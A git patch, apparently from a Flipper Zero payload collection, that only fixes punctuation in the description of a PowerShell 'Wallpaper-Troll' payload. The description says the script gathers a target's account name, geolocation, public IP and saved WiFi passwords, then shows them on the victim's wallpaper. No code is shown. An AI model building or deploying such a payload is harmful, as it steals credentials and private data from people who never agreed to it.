From 1ea870e4490ff08a0638a45d7db59a27ca4c07a2 Mon Sep 17 00:00:00 2001 From: Kavitate <79380289+Kavitate@users.noreply.github.com> Date: Sat, 24 Dec 2022 09:26:56 -0600 Subject: [PATCH] Update Wallpaper-Troll.ps1 --- Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 index 727c0a4..25e38a8 100644 --- a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 +++ b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 @@ -21,10 +21,10 @@ .DESCRIPTION This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude, - Public IP, and and the SSID and WiFi password of any current or previously connected to networks. - It will take the gathered information and generate a .jpg with that information on show - Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned - Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop + Public IP, the SSID, and WiFi password of any current or previously connected to networks. + It will take the gathered information and generate a .jpg with that information on show. + Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned. + Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop. #> #############################################################################################################################################